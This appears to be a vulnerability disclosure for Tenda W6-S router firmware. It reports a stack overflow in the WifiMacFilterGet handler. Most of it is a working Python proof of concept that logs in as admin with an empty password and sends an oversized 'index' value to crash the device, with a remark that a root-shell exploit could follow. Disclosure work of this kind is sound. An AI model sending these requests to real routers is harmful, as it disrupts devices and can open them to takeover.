Tenda W6-S V1.0.0.4(510) Stack overflow vulnerability
Firmware information
-
Manufacturer's address:https://www.tenda.com.cn/
-
Firmware download address : https://www.tenda.com.cn/download/detail-2627.html
Affected version
Vulnerability details
In /goform/WifiMacFilterGet, when wl_radio is 0, the index will be spliced into v6 by sprintf. It is worth noting that there is no size check, which leads to a stack overflow vulnerability.
Poc
import requests
target_url = 'http://192.168.10.105/login/Auth'
target_headers = {'Host' : '192.168.10.105',
'Content-Length' : '65',
'Accept' : '*/*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p1 = 'usertype=admin&password=&time=2022;7;6;14;9;6&username='
requests.post(target_url, headers = target_headers, data = p1, verify = False, timeout = 1)
target_url = 'http://192.168.10.105/goform/WifiMacFilterGet'
target_headers = {'Host' : '192.168.10.105',
'Content-Length' : '295',
'Accept' : '*/*',
'X-Requested-With' : 'XMLHttpRequest',
'User-Agent' : 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36',
'Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8',
'Origin' : 'http://192.168.10.105',
'Referer' : 'http://192.168.10.105/main.html',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'en-US,en;q=0.9',
'Cookie' : 'user=',
'Connection' : 'close'}
p2 = 'wl_radio=0&index=' + 'a' * 0x3000
requests.post(target_url, headers = target_headers, data = p2, verify = False, timeout = 1)After sending the poc, the router will crash, and finally we can write the exp to get the root shell

